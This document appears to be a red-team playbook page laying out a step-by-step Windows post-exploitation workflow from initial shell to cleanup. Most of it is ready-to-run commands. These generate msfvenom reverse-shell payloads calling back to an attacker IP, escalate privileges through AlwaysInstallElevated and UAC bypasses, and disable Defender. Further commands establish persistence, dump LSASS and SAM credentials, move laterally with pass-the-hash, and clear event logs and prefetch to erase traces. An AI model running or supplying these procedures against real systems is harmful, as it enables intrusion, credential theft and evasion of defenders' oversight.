Operational Workflow
This page maps a common CTE kill chain - from initial shell to cleanup - with branch points that route to the appropriate technique based on what you find. It is one way to work through an engagement, not the only way. Adapt it to your operational context.
Read the Introduction first for scope and constraints.
Pre-Mission Setup (Before Engaging)β
Before engaging the target, an operator would typically have a listener running and payloads pre-generated. Here is an example setup on Kali:
# Confirm your attacker IP is reachable from the target network
ip a
# Start your multi/handler listener (leave running throughout the mission)
msfconsole -x "use exploit/multi/handler;
set payload windows/x64/meterpreter/reverse_https;
set LHOST 0.0.0.0;
set LPORT 443;
run -j;"
# Pre-generate standard payloads and serve them
ATTACKER_IP="<YOUR_IP>"
msfvenom -p windows/x64/meterpreter/reverse_https LHOST="${ATTACKER_IP}" LPORT=443 -f exe -o payload.exe
msfvenom -p windows/x64/meterpreter/reverse_https LHOST="${ATTACKER_IP}" LPORT=443 -f dll -o payload.dll
msfvenom -p windows/x64/meterpreter/reverse_https LHOST="${ATTACKER_IP}" LPORT=443 -f msi -o payload.msi
python3 -m http.server 8080
# For environments where EXE drops are detected, pre-generate a web_delivery fileless cradle
# Run the web_delivery module, copy the generated PS one-liner, replace 0.0.0.0 with your IP
Phase 1: Land and Orientβ
With a shell, the first priority is understanding the environment. The T1082 Discovery workflow covers this in depth. A typical starting point:
whoami /all
echo %COMPUTERNAME% && echo %USERDOMAIN% && echo %LOGONSERVER%
systeminfo | findstr /i "domain\|os name\|os version"
ipconfig /all
arp -a
netstat -ano | findstr "LISTENING"
What whoami /all shows shapes the next decision:
What whoami /all shows | Common next step |
|---|---|
NT AUTHORITY\SYSTEM | Skip Phase 2 - go directly to Phase 3 (Persist) and Phase 4 (Credentials) |
BUILTIN\Administrators in groups | Phase 2A (UAC Bypass / AlwaysInstallElevated) |
| Domain user, no admin groups | Phase 2B (Local Privesc - service misconfigs) |
SeDebugPrivilege enabled | Phase 4 directly (LSASS dump without UAC bypass) |
Phase 2A: Elevate - Already Admin, Need SYSTEMβ
If already a local administrator but UAC is blocking full access, the fastest path is typically to check AlwaysInstallElevated first:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
- Both return
0x1- T1548 AlwaysInstallElevated -msiexec /i <URL> /qnyields a SYSTEM session with no UAC bypass needed.
If AlwaysInstallElevated is not set, a UAC bypass is needed:
- Default environment - T1548.002 Fodhelper (user-level admin, UAC prompt bypass via fodhelper registry write)
- Need a DLL-based bypass - T1548.002 Control.exe (same file, different method)
From an elevated shell, disabling Defender protects subsequently delivered payloads:
Set-MpPreference -DisableRealtimeMonitoring $true
Add-MpPreference -ExclusionPath "C:\Windows\Temp"
See T1562.001 - Disable Security Tools.
Phase 2B: Elevate - Standard User, No Adminβ
With only standard user access, checking for local privilege escalation opportunities in roughly this order tends to be effective:
| Check | Command | Technique if vulnerable |
|---|---|---|
| AlwaysInstallElevated | reg query HKCU\...\Installer /v AlwaysInstallElevated | T1548 AlwaysInstallElevated |
| Unquoted service paths | wmic service get Name,PathName | findstr /v """ | T1574.009 |
| Writable service binaries | Check write perms on service EXE paths | T1574.010 |
| Writable service registry keys | Check write perms on HKLM\SYSTEM\CurrentControlSet\Services\* | T1574.011 |
If no local privesc is available, establishing user-level persistence and waiting is a valid option. A domain admin or privileged user may log in to the same machine - combining the keylogger (T1056.001) or WDigest enable with that wait often yields elevated credentials.
Phase 3: Establish Persistenceβ
Persistence is typically set before noisy operations like credential dumping or lateral movement sweeps - if the session is lost, having a way back matters. Technique selection depends on context:
| Context | One approach | Why it fits |
|---|---|---|
| Standard user, low-detection environment | Scheduled Task (T1053.005) | Reliable, survives reboot, runs at logon |
| Standard user, AppLocker active | Registry Run Key (T1547.001) + fileless cradle | No dropped EXE; PS cradle stored in registry |
| Administrator, want SYSTEM on reboot | Windows Service (T1543.003) | Runs as SYSTEM, starts automatically |
| Administrator, want high stealth | WMI Event Subscription (T1546.003) | No new binaries; lives in WMI repository |
| Administrator, want long-term covert access | COM Hijacking (T1546.015) | Fires on logon; hard to detect via normal tooling |
| SYSTEM, want permanent access regardless of password changes | Accessibility Features (T1546.008) | SYSTEM shell at login screen, survives all credential rotation |
Triggering the persistence manually before moving on - running the scheduled task, restarting the service - and confirming a new session arrives is a good practice before proceeding to noisier phases.
Phase 4: Collect Credentialsβ
Running credential collection in a low-to-high noise order tends to be effective - stopping when enough is found for the next phase.
Step 1: Plaintext credentials (no elevated rights needed)β
These sources frequently contain plaintext domain credentials and require no privilege escalation to read:
# Auto-logon (often has domain admin password):
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
# PowerShell history (may contain typed passwords):
type "%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
# WiFi passwords:
netsh wlan show profiles | findstr "All User"
Full procedure: T1552 - Credentials in Files/Registry
If plaintext credentials are found here, they can feed directly into lateral movement (Phase 5) without needing a dump.
Step 2: Check Credential Managerβ
cmdkey /list
Entries under TERMSRV/ (saved RDP) or Domain:target= (saved network credentials) can be reused immediately with runas /savecred. Full procedure: T1003 Method 4 - cmdkey
Step 3: Check LSA protection before attempting LSASS dumpβ
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL
RunAsPPL = 1- LSASS is protected process;comsvcsMiniDump will fail - go to Step 4 (SAM hives)RunAsPPL = 0or absent - LSASS dump is likely to succeed
Step 4: Dump LSASS (requires SYSTEM or SeDebugPrivilege)β
tasklist /FI "IMAGENAME eq lsass.exe"
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> C:\Windows\Temp\lsass.dmp full
Parse on Kali: pypykatz lsa minidump /tmp/lsass.dmp
Step 5: Export SAM/SYSTEM/SECURITY (requires Administrator, no SYSTEM needed)β
reg save HKLM\SAM C:\Windows\Temp\sam.hive
reg save HKLM\SYSTEM C:\Windows\Temp\system.hive
reg save HKLM\SECURITY C:\Windows\Temp\security.hive
Parse on Kali: impacket-secretsdump -sam sam.hive -system system.hive -security security.hive LOCAL
Full procedures: T1003 - OS Credential Dumping
Phase 5: Move Laterallyβ
With credentials (plaintext or NTLM hash), movement to additional hosts becomes possible.
The ARP cache and netstat output from Phase 1 are useful for identifying targets - hosts in the ARP cache are reachable and have recently communicated:
arp -a
Lateral movement method depends on what credentials are available and what services are exposed:
| Credential type | Remote OS | One approach |
|---|---|---|
| Plaintext domain admin | Any Windows | net use then wmic /node: process call create or schtasks /s |
| NTLM hash of RID-500 local admin | Any Windows | impacket-psexec -hashes :HASH Administrator@<TARGET> from Kali |
| Plaintext, WinRM open (port 5985) | Any Windows | Invoke-Command -ComputerName <TARGET> -Credential $cred |
| Plaintext, SMB only | Any Windows | net use \\<TARGET>\C$ then sc.exe \\<TARGET> create |
Full procedures: T1021 - Lateral Movement
On each new host, restarting from Phase 1 - discovery, privilege check, persistence, credentials - and repeating until objectives are met is the general pattern.
Phase 6: Clean Upβ
Working backwards through the footprint before terminating a session. Typical order:
1. Remove persistence - delete scheduled tasks, Run keys, services, WMI subscriptions placed during Phase 3. Each technique file includes a cleanup section.
2. Delete payload files and credential dumps:
del /f /q C:\Windows\Temp\*.exe C:\Windows\Temp\*.dll C:\Windows\Temp\*.dmp
del /f /q C:\Windows\Temp\*.hive C:\Windows\Temp\*.msi C:\Windows\Temp\*.cs
3. Restore security tools (if disabled in Phase 2A):
Set-MpPreference -DisableRealtimeMonitoring $false
Remove-MpPreference -ExclusionPath "C:\Windows\Temp"
4. Overwrite free space in staging directory:
cipher /w:C:\Windows\Temp
5. Clear targeted prefetch entries:
del /f /q "C:\Windows\Prefetch\PAYLOAD*.pf"
del /f /q "C:\Windows\Prefetch\RUNDLL32*.pf"
del /f /q "C:\Windows\Prefetch\MSIEXEC*.pf"
6. Clear event logs - typically the last step before disconnecting:
wevtutil cl Security
wevtutil cl System
wevtutil cl "Microsoft-Windows-Sysmon/Operational"
wevtutil cl "Microsoft-Windows-PowerShell/Operational"
wevtutil cl "Microsoft-Windows-TaskScheduler/Operational"
Full procedures: T1070 - Indicator Removal
Decision Tree Summaryβ
SHELL OBTAINED
β
βββΊ Phase 1: DISCOVER (orient before anything else)
β whoami /all β systeminfo β arp -a β netstat -ano
β
βββΊ Phase 2: ELEVATE
β SYSTEM already? βββββββββββββββββββββββββββββββΊ skip to Phase 3
β Admin (in Administrators group)?
β AlwaysInstallElevated enabled? βββββββββββΊ msiexec /i payload.msi /qn β SYSTEM
β No? ββββββββββββββββββββββββββββββββββββββΊ Fodhelper UAC bypass β elevated shell
β Standard user?
β Unquoted path / writable service? ββββββββΊ T1574 privesc
β Nothing? βββββββββββββββββββββββββββββββββΊ persist + collect creds + wait
β
βββΊ Phase 3: PERSIST (before noisy ops)
β Low stealth needed? ββββββββββββββββββββββββββΊ Scheduled Task
β High stealth needed? βββββββββββββββββββββββββΊ WMI Subscription or COM Hijack
β Need SYSTEM persistence? βββββββββββββββββββββΊ Windows Service or Accessibility Feature
β
βββΊ Phase 4: COLLECT CREDENTIALS
β Check files/registry first (no privesc needed)
β β Found plaintext? ββββββββββββββββββββββββββΊ use directly, skip dump
β Check cmdkey /list
β β Found saved creds? βββββββββββββββββββββββΊ runas /savecred
β RunAsPPL enabled?
β β Yes ββββββββββββββββββββββββββββββββββββββΊ SAM/SYSTEM hives only
β β No βββββββββββββββββββββββββββββββββββββββΊ LSASS MiniDump (comsvcs.dll)
β
βββΊ Phase 5: MOVE LATERALLY
β For each target from ARP cache:
β Authenticate (net use / impacket PTH)
β Stage payload
β Execute remotely (wmic / schtasks / sc.exe / WinRM)
β Restart from Phase 1 on new host
β
βββΊ Phase 6: CLEAN UP (every host, before disconnect)
Remove persistence β delete files β restore Defender
β overwrite free space β clear prefetch β clear logs
Quick Reference: Technique File Indexβ
| Tactic | Technique | File |
|---|---|---|
| Privesc | AlwaysInstallElevated | t1548_alwaysinstallelevated |
| Privesc | Bypass UAC (Fodhelper / Control.exe) | t1548.002_bypass_uac |
| Privesc | Unquoted Service Path | t1574.009 |
| Privesc | Service File Permissions | t1574.010 |
| Privesc | Service Registry Permissions | t1574.011 |
| Cred Access | Credentials in Files/Registry | t1552 |
| Cred Access | Credential Manager (cmdkey) | t1003 - Method 4 |
| Cred Access | LSASS MiniDump | t1003 - Method 1 |
| Cred Access | SAM / SYSTEM hive export | t1003 - Method 2 |
| Lateral Movement | All LOL methods | t1021_lateral_movement |
| Defense Evasion | Disable Defender / AMSI / Firewall | t1562.001 |
| Defense Evasion | Obfuscate PS cradles | t1027_obfuscation |
| Defense Evasion | Signed binary proxy (AppLocker bypass) | t1218 |
| Cleanup | Log clearing / file deletion / timestomp | t1070_indicator_removal |
| Discovery | Full host enumeration workflow | t1082_host_discovery |
| Persistence | All 12 methods | 03_Persistence |
| Payload generation | msfvenom formats and listeners | APPENDIX/metasploit_payloads |
| Compiled payloads | C# service EXE, DLL, stager | APPENDIX/compiled_payloads |